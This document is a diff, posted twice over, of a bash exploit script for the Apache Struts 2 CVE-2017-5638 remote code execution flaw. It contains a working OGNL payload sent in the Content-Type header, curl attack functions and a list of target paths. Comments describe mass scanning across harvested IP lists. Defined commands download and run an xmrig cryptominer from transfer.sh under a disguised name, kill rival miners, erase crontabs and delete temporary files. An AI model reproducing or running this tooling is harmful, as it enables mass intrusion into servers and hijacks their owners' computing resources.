f0r34chb3t4 · January 26, 2021 10:04
diff --git a/CVE-2017-5638.sh b/CVE-2017-5638.sh
 #!/bin/bash
 #
 # Poc
 #
 # ./CVE-2017-5638.sh 192.168.9.3
 #
 # by f0r34chb3t4 - Qui Abr 12 21:00:24 -03 2018
 #
 # CVE-2017-5638
 # Apache Struts 2 Vulnerability Remote Code Execution
 # grep -iP 'mod_jk|Servlet|Tomcat|JBoss|Apache-Coyote|JSESSIONID|Jenkins|CJServer|Jetty|GlassFish|Oracle|Payara|JSP/' out.out|awk '{print $2}' > ips3
 #https://waf.ninja/struts2-vulnerability-evolution/
 #https://github.com/frohoff/ysoserial
 #Server: nginx
 #Server: Jetty
 #Server: Apache-Coyote
 #Server: GlassFish
 #X-Powered-By: Servlet
 #Set-Cookie: JSESSIONID=
 #X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
 #Server: Oracle-Application-Server-11g
 #Server: TWebAP
 #Server: nginx
 #awk '{print $2,substr($5, 1, length($5)-13)}' out-81.out|sort -u|sort -R| xargs -P2000 -l timeout 60 ./xpl.sh 2>/dev/null

 #awk '{print $2,substr($5, 1, length($5)-13)}' out-81.out|sort -u|sort -R| parallel  -j256 --delay 1 --colsep ' ' ./xpl.sh {1} {2}

 readonly IPv4="$1"
 readonly PORT=${2:-80}

 [ -z "${IPv4}" ] && exit 1
 [ -z "${PORT}" ] && exit 1

 sleep .$[ ( $RANDOM % 4 ) + 1 ]s

 #readonly COOKIE=$( mktemp --dry-run )
 readonly COOKIE='xXxXxXxXxXx.dat'
 #trap "rm -rf ${COOKIE}" EXIT


 #readonly CMD='echo \\win\\n\\n\\n\\n'
 #readonly CMD_LNX='echo \\win\\n\\n\\n\\n'
 #readonly CMD_WIN='echo \\win\\n\\n\\n\\n'

 readonly CMD='whoami'
 readonly CMD_LNX='whoami'
 readonly CMD_WIN='whoami'




 #readonly CMD_LNX='ps xf;cd /tmp;ls -lia;curl -s https://transfer.sh/ZSjCf/xmrig > udevd || wget -q -O udevd https://transfer.sh/ZSjCf/xmrig;chmod +x udevd;./udevd;rm -rf udevd;ps xf;exit'
 #readonly CMD_WIN='echo \\win\\n\\n\\n\\n'

 #readonly CMD='whoami;id;uname -a;hostname;ls -lia;cat /etc/passwd;ps xf;ss -tnp;tail -n100 ~/.bash_history'

 #readonly PAYLOAD="%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

 readonly TIMEOUT=5
 readonly CONNECT_TIMEOUT=5
 readonly MAX_TIME=5
 readonly USERAGENT='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0'

 readonly GOOD_KEY=$( head /dev/urandom | tr -dc A-F0-9 | head -c10 )
 readonly EXEC='(#[email protected]@getProperty("os.name")).(#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Set-Cookie","'${GOOD_KEY}'="+#os))'
 #readonly PAYLOAD='%{(#_="multipart/form-data").(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${EXEC}"'}'



 readonly CMD_KILL='rm -rf /tmp/* /var/tmp/*;ps xf | grep -v grep | grep -E "./nice|./Linux2.6|./atd|./bibi|./usbd|./ddos|config.json|supsplk|nbu.cf|/bin/wipefs|0x4022b1dd|/usr/bin/.sfhd|tcp.ngrok.io|./cmwxd|sleep 3600|minexmr|./LinuxTF|./fdased|./brb|./l6us|./l6us|./xt9527|/usr/bin/.sshd|360.6|./and|./udp12345|./we2dafw|./adwes|./2ew3da1ewa|./542esdew|./llin|./ag|crond|UCM_SIP.exe|./ps|UCM_MS.exe|/tmp/.|logo3.jpg|./mass|sesion.php|lol2.tar.gz|larva.sh|./run.sh|./777dead|/tmp/XMRSH|./ntion|./654|./.conest|./linux|./hpdzsd|oracle.jpg|lol1.tar.gz|hashvault|eeme7j.win|xmrig|nicehash|crawler.weibo|243/44444|cryptonight|stratum|gpg-daemon|jobs.flu.cc|nmap|cranberry|start.sh|watch.sh|krun.sh|killTop.sh|cpuminer|/60009|ssh_deny.sh|clean.sh|./over|mrx1|redisscan|ebscan|redis-cli|barad_agent|.sr0|clay|udevs|/tmp/init|pnscan" | while read pid _; do kill -9 $pid; done;ps xf;crontab -r;exit'
 readonly CMD_MISC='echo "nameserver 8.8.4.4" >> /etc/resolv.conf;echo "nameserver 8.8.8.8" >> /etc/resolv.conf;echo 128 > /proc/sys/vm/nr_hugepages;sysctl -w vm.nr_hugepages=128;exit'
 readonly CMD_XMRIG='cd /tmp;curl -s https://transfer.sh/b3sa7/xmrig > udevd || wget -q -O udevd https://transfer.sh/b3sa7/xmrig;chmod +x udevd;./udevd;rm -rf udevd;exit'
 #readonly CMD_EXEC="((${CMD_KILL})2>/dev/null;(${CMD_MISC})2>/dev/null;(${CMD_XMRIG})2>/dev/null) & (ps xf;id;uname -a)"
 #readonly CMD_EXEC="((${CMD_XMRIG})2>/dev/null &);uname -a;id;hostname;ps xf;exit"
 readonly CMD_EXEC='uname -a;id;hostname;exit'
 readonly PAYLOAD="%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='tasklist').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"



 #sudo -u bebete 
 function hrce(){

 	local url="$1" 
 	curl --tcp-nodelay --globoff -H 'Accept-Encoding: identity' --location --max-redirs 5 -ivIs --insecure --connect-timeout ${CONNECT_TIMEOUT} --max-time ${MAX_TIME} --user-agent "${USERAGENT}" --url "${url}"

 }


 #sudo -u bebete 
 function rce(){

 	local url="$1"
 	curl --tcp-nodelay --globoff -H 'Accept-Encoding: identity' --location --max-redirs 5 -ivs -b ${COOKIE} -c ${COOKIE} --insecure --connect-timeout ${CONNECT_TIMEOUT} --max-time ${MAX_TIME} --user-agent "${USERAGENT}" -H 'Content-Type: '"${PAYLOAD}" --url "${url}"

 }


 # exploit PUT METHOD
 function put_rce(){

 	local url="$1"
 	local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 )

 	curl -svi -X PUT -0 \
 	--location --max-redirs 3 \
 	-H 'Content-Type: '"${PAYLOAD}" \
 	-H 'Connection: close' \
 	-H 'Content-Length: 0' \
 	-H "Cookie: JSESSIONID=${JSESSIONID}" \
 	-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
 	-H 'Accept-Language: en-US,en;q=0.5' \
 	-H 'Accept-Encoding: identity' \
 	--connect-timeout ${CONNECT_TIMEOUT} \
 	--max-time ${MAX_TIME} \
 	--user-agent "${USERAGENT}" \
 	--url "${url}"

 }


 function check(){

 	local url="$1"
 	local buffer="$2"

 	local os=$( grep -F 'Set-Cookie:' <<< "${buffer}" | tr -d $'\r' | grep -F "${GOOD_KEY}" | cut -d '=' -f2- | head -n1 )

 	if [ ! -z "${os}" ]; then

 		printf '[+] vul: %s os: %s\n' "${url}" "${os}" | tee -a vul-os.dat
 		exit 0		 

 	fi
 	
 	if grep -qF 'winnnnn' <<< "${buffer}";then
 		printf '[+] vul lnx: %s\n\n%s\n\n' "${url}" "${buffer}" | tee -a vul-lnx.dat
 		exit 0
 	fi

 	if grep -qF '\win\n\n\n\n' <<< "${buffer}";then
 		printf '[+] vul win: %s\n\n%s\n\n' "${url}" "${buffer}" | tee -a vul-win.dat
 		exit 0
 	fi


 	if ! grep -qF 'HTTP/1.' <<< "${buffer}";then
 		exit 1
 	fi
 	

 }


 ################################################################################
 # path list
 ################################################################################
 read -d '\n' -r PATH_LIST <<-'TXT'
 /index.do
 /public/
 /login
 /login.html
 /iframe/index!index.action
 /index.action
 /user/login.action
 /LoginForm
 /main.html
 /system/Login.do
 /bbs/bbs/view.act
 /help.action
 /userlogin!doDefault.action
 /default.action
 /login.action
 /admin.action
 /auth/start
 /Pages/login?domain_login=true
 /admin/index.do
 /ipmsLogin.jsp
 /dhis-web-commons/security/login.action
 /security/login.hlt
 /security/
 /Default.action
 /login.do
 /index!index.action
 /site/index.action
 /showNews.action
 /app/login.action
 /app/
 /WebApp/
 /pages/common/sessonExceptionPage.jsp
 /pages/
 /common/
 /ezon/
 /bamboo/about.action
 /bamboo/
 /viewAdministrators.action
 /content!mail.action
 /base.action?page=login
 /eDocs-Accounts/
 /user/main-1.html
 /edms/index.do
 /login.jsp
 /invoice-homepage/
 /login/
 /admin/
 /web/loginPage.do2
 /web/
 /vas/
 /Index_showIndex.do
 /userLogin.action
 /index2.jsp
 /orders.xhtml
 /struts2-showcase/index.action
 /login-before.xhtml
 /account/login.jsp
 /service/
 /admin/timeout.jsp
 /Secure/
 /portal/
 /upload/
 /themes/
 /content/
 /var/
 /cache/
 /welcome
 /anonymous/login.xhtml
 /Tomcat
 /JBoss
 /common/index/style/login/loginJY.jsp
 /index?first=true
 /cms/login
 /cms/
 /login_authLogin.action
 /error/errorEvents.action
 /j_spring_security_check
 /login.action?login_error=1
 /Login!start.action
 TXT


 #res="$( hrce "http://${IPv4}:${PORT}/" )"

 #if ! grep -qiP 'mod_jk|nginx|Servlet|Tomcat|JBoss|Apache-Coyote|JSESSIONID|Jenkins|CJServer|Jetty|GlassFish|Oracle|Payara|JSP/' <<< "${res}";then

 #	printf '[+] init: %s\n' "http://${IPv4}:${PORT}"

 #else

 #	printf '[-] exit: %s\n' "http://${IPv4}:${PORT}"
 #	exit 1

 #fi


 #check "http://${IPv4}:${PORT}/" "$( rce "http://${IPv4}:${PORT}/" )"

 #echo "${CMD_EXEC}"

 #exit 0

 rce "http://${IPv4}:${PORT}/"

 #echo "${PAYLOAD}"

 exit 0

 res="$( put_rce "http://${IPv4}:${PORT}/Hello.World" )"

 if grep -qP 'uid=[0-9]{1,5}\(.+?\)' <<< "${res}"; then 
 	printf '[+] vul: %s\n' "http://${IPv4}:${PORT}" | tee -a vul.dat
 	printf '%s\n\n' "${res}"
 fi

 exit 0

 for XPATH in ${PATH_LIST};do

 	check "http://${IPv4}:${PORT}${XPATH}" "$( rce "http://${IPv4}:${PORT}${XPATH}" )"

 done

 #if grep -qP 'uid=[0-9]{1,5}\(.+?\)' <<< "${res}"; then 
 #	printf '[+] vul: %s\n' ${IPv4}
 #	printf '\n\n%s\n\n' "${res}"
 #fi


 #check "https://${IPv4}" "$( rce "https://${IPv4}" )"


 #check "${IPv4}:8080" "$( rce "${IPv4}:8080" )"


 exit 0
	#!/bin/bash
	#
	# Poc
	#
	# ./CVE-2017-5638.sh 192.168.9.3
	#
	# by f0r34chb3t4 - Qui Abr 12 21:00:24 -03 2018
	#
	# CVE-2017-5638
	# Apache Struts 2 Vulnerability Remote Code Execution
	# grep -iP 'mod_jk\|Servlet\|Tomcat\|JBoss\|Apache-Coyote\|JSESSIONID\|Jenkins\|CJServer\|Jetty\|GlassFish\|Oracle\|Payara\|JSP/' out.out\|awk '{print $2}' > ips3
	#https://waf.ninja/struts2-vulnerability-evolution/
	#https://github.com/frohoff/ysoserial
	#Server: nginx
	#Server: Jetty
	#Server: Apache-Coyote
	#Server: GlassFish
	#X-Powered-By: Servlet
	#Set-Cookie: JSESSIONID=
	#X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
	#Server: Oracle-Application-Server-11g
	#Server: TWebAP
	#Server: nginx
	#awk '{print $2,substr($5, 1, length($5)-13)}' out-81.out\|sort -u\|sort -R\| xargs -P2000 -l timeout 60 ./xpl.sh 2>/dev/null

	#awk '{print $2,substr($5, 1, length($5)-13)}' out-81.out\|sort -u\|sort -R\| parallel -j256 --delay 1 --colsep ' ' ./xpl.sh {1} {2}

	readonly IPv4="$1"
	readonly PORT=${2:-80}

	[ -z "${IPv4}" ] && exit 1
	[ -z "${PORT}" ] && exit 1

	sleep .$[ ( $RANDOM % 4 ) + 1 ]s

	#readonly COOKIE=$( mktemp --dry-run )
	readonly COOKIE='xXxXxXxXxXx.dat'
	#trap "rm -rf ${COOKIE}" EXIT


	#readonly CMD='echo \\win\\n\\n\\n\\n'
	#readonly CMD_LNX='echo \\win\\n\\n\\n\\n'
	#readonly CMD_WIN='echo \\win\\n\\n\\n\\n'

	readonly CMD='whoami'
	readonly CMD_LNX='whoami'
	readonly CMD_WIN='whoami'




	#readonly CMD_LNX='ps xf;cd /tmp;ls -lia;curl -s https://transfer.sh/ZSjCf/xmrig > udevd \|\| wget -q -O udevd https://transfer.sh/ZSjCf/xmrig;chmod +x udevd;./udevd;rm -rf udevd;ps xf;exit'
	#readonly CMD_WIN='echo \\win\\n\\n\\n\\n'

	#readonly CMD='whoami;id;uname -a;hostname;ls -lia;cat /etc/passwd;ps xf;ss -tnp;tail -n100 ~/.bash_history'

	#readonly PAYLOAD="%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

	readonly TIMEOUT=5
	readonly CONNECT_TIMEOUT=5
	readonly MAX_TIME=5
	readonly USERAGENT='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0'

	readonly GOOD_KEY=$( head /dev/urandom \| tr -dc A-F0-9 \| head -c10 )
	readonly EXEC='(#[email protected]@getProperty("os.name")).(#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Set-Cookie","'${GOOD_KEY}'="+#os))'
	#readonly PAYLOAD='%{(#_="multipart/form-data").(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${EXEC}"'}'



	readonly CMD_KILL='rm -rf /tmp/* /var/tmp/*;ps xf \| grep -v grep \| grep -E "./nice\|./Linux2.6\|./atd\|./bibi\|./usbd\|./ddos\|config.json\|supsplk\|nbu.cf\|/bin/wipefs\|0x4022b1dd\|/usr/bin/.sfhd\|tcp.ngrok.io\|./cmwxd\|sleep 3600\|minexmr\|./LinuxTF\|./fdased\|./brb\|./l6us\|./l6us\|./xt9527\|/usr/bin/.sshd\|360.6\|./and\|./udp12345\|./we2dafw\|./adwes\|./2ew3da1ewa\|./542esdew\|./llin\|./ag\|crond\|UCM_SIP.exe\|./ps\|UCM_MS.exe\|/tmp/.\|logo3.jpg\|./mass\|sesion.php\|lol2.tar.gz\|larva.sh\|./run.sh\|./777dead\|/tmp/XMRSH\|./ntion\|./654\|./.conest\|./linux\|./hpdzsd\|oracle.jpg\|lol1.tar.gz\|hashvault\|eeme7j.win\|xmrig\|nicehash\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|.sr0\|clay\|udevs\|/tmp/init\|pnscan" \| while read pid _; do kill -9 $pid; done;ps xf;crontab -r;exit'
	readonly CMD_MISC='echo "nameserver 8.8.4.4" >> /etc/resolv.conf;echo "nameserver 8.8.8.8" >> /etc/resolv.conf;echo 128 > /proc/sys/vm/nr_hugepages;sysctl -w vm.nr_hugepages=128;exit'
	readonly CMD_XMRIG='cd /tmp;curl -s https://transfer.sh/b3sa7/xmrig > udevd \|\| wget -q -O udevd https://transfer.sh/b3sa7/xmrig;chmod +x udevd;./udevd;rm -rf udevd;exit'
	#readonly CMD_EXEC="((${CMD_KILL})2>/dev/null;(${CMD_MISC})2>/dev/null;(${CMD_XMRIG})2>/dev/null) & (ps xf;id;uname -a)"
	#readonly CMD_EXEC="((${CMD_XMRIG})2>/dev/null &);uname -a;id;hostname;ps xf;exit"
	readonly CMD_EXEC='uname -a;id;hostname;exit'
	readonly PAYLOAD="%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='tasklist').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"



	#sudo -u bebete
	function hrce(){

	local url="$1"
	curl --tcp-nodelay --globoff -H 'Accept-Encoding: identity' --location --max-redirs 5 -ivIs --insecure --connect-timeout ${CONNECT_TIMEOUT} --max-time ${MAX_TIME} --user-agent "${USERAGENT}" --url "${url}"

	}


	#sudo -u bebete
	function rce(){

	local url="$1"
	curl --tcp-nodelay --globoff -H 'Accept-Encoding: identity' --location --max-redirs 5 -ivs -b ${COOKIE} -c ${COOKIE} --insecure --connect-timeout ${CONNECT_TIMEOUT} --max-time ${MAX_TIME} --user-agent "${USERAGENT}" -H 'Content-Type: '"${PAYLOAD}" --url "${url}"

	}


	# exploit PUT METHOD
	function put_rce(){

	local url="$1"
	local JSESSIONID=$( head /dev/urandom \| tr -dc A-F0-9 \| head -c32 )

	curl -svi -X PUT -0 \
	--location --max-redirs 3 \
	-H 'Content-Type: '"${PAYLOAD}" \
	-H 'Connection: close' \
	-H 'Content-Length: 0' \
	-H "Cookie: JSESSIONID=${JSESSIONID}" \
	-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8' \
	-H 'Accept-Language: en-US,en;q=0.5' \
	-H 'Accept-Encoding: identity' \
	--connect-timeout ${CONNECT_TIMEOUT} \
	--max-time ${MAX_TIME} \
	--user-agent "${USERAGENT}" \
	--url "${url}"

	}


	function check(){

	local url="$1"
	local buffer="$2"

	local os=$( grep -F 'Set-Cookie:' <<< "${buffer}" \| tr -d $'\r' \| grep -F "${GOOD_KEY}" \| cut -d '=' -f2- \| head -n1 )

	if [ ! -z "${os}" ]; then

	printf '[+] vul: %s os: %s\n' "${url}" "${os}" \| tee -a vul-os.dat
	exit 0

	fi

	if grep -qF 'winnnnn' <<< "${buffer}";then
	printf '[+] vul lnx: %s\n\n%s\n\n' "${url}" "${buffer}" \| tee -a vul-lnx.dat
	exit 0
	fi

	if grep -qF '\win\n\n\n\n' <<< "${buffer}";then
	printf '[+] vul win: %s\n\n%s\n\n' "${url}" "${buffer}" \| tee -a vul-win.dat
	exit 0
	fi


	if ! grep -qF 'HTTP/1.' <<< "${buffer}";then
	exit 1
	fi


	}


	################################################################################
	# path list
	################################################################################
	read -d '\n' -r PATH_LIST <<-'TXT'
	/index.do
	/public/
	/login
	/login.html
	/iframe/index!index.action
	/index.action
	/user/login.action
	/LoginForm
	/main.html
	/system/Login.do
	/bbs/bbs/view.act
	/help.action
	/userlogin!doDefault.action
	/default.action
	/login.action
	/admin.action
	/auth/start
	/Pages/login?domain_login=true
	/admin/index.do
	/ipmsLogin.jsp
	/dhis-web-commons/security/login.action
	/security/login.hlt
	/security/
	/Default.action
	/login.do
	/index!index.action
	/site/index.action
	/showNews.action
	/app/login.action
	/app/
	/WebApp/
	/pages/common/sessonExceptionPage.jsp
	/pages/
	/common/
	/ezon/
	/bamboo/about.action
	/bamboo/
	/viewAdministrators.action
	/content!mail.action
	/base.action?page=login
	/eDocs-Accounts/
	/user/main-1.html
	/edms/index.do
	/login.jsp
	/invoice-homepage/
	/login/
	/admin/
	/web/loginPage.do2
	/web/
	/vas/
	/Index_showIndex.do
	/userLogin.action
	/index2.jsp
	/orders.xhtml
	/struts2-showcase/index.action
	/login-before.xhtml
	/account/login.jsp
	/service/
	/admin/timeout.jsp
	/Secure/
	/portal/
	/upload/
	/themes/
	/content/
	/var/
	/cache/
	/welcome
	/anonymous/login.xhtml
	/Tomcat
	/JBoss
	/common/index/style/login/loginJY.jsp
	/index?first=true
	/cms/login
	/cms/
	/login_authLogin.action
	/error/errorEvents.action
	/j_spring_security_check
	/login.action?login_error=1
	/Login!start.action
	TXT


	#res="$( hrce "http://${IPv4}:${PORT}/" )"

	#if ! grep -qiP 'mod_jk\|nginx\|Servlet\|Tomcat\|JBoss\|Apache-Coyote\|JSESSIONID\|Jenkins\|CJServer\|Jetty\|GlassFish\|Oracle\|Payara\|JSP/' <<< "${res}";then

	# printf '[+] init: %s\n' "http://${IPv4}:${PORT}"

	#else

	# printf '[-] exit: %s\n' "http://${IPv4}:${PORT}"
	# exit 1

	#fi


	#check "http://${IPv4}:${PORT}/" "$( rce "http://${IPv4}:${PORT}/" )"

	#echo "${CMD_EXEC}"

	#exit 0

	rce "http://${IPv4}:${PORT}/"

	#echo "${PAYLOAD}"

	exit 0

	res="$( put_rce "http://${IPv4}:${PORT}/Hello.World" )"

	if grep -qP 'uid=[0-9]{1,5}\(.+?\)' <<< "${res}"; then
	printf '[+] vul: %s\n' "http://${IPv4}:${PORT}" \| tee -a vul.dat
	printf '%s\n\n' "${res}"
	fi

	exit 0

	for XPATH in ${PATH_LIST};do

	check "http://${IPv4}:${PORT}${XPATH}" "$( rce "http://${IPv4}:${PORT}${XPATH}" )"

	done

	#if grep -qP 'uid=[0-9]{1,5}\(.+?\)' <<< "${res}"; then
	# printf '[+] vul: %s\n' ${IPv4}
	# printf '\n\n%s\n\n' "${res}"
	#fi


	#check "https://${IPv4}" "$( rce "https://${IPv4}" )"


	#check "${IPv4}:8080" "$( rce "${IPv4}:8080" )"


	exit 0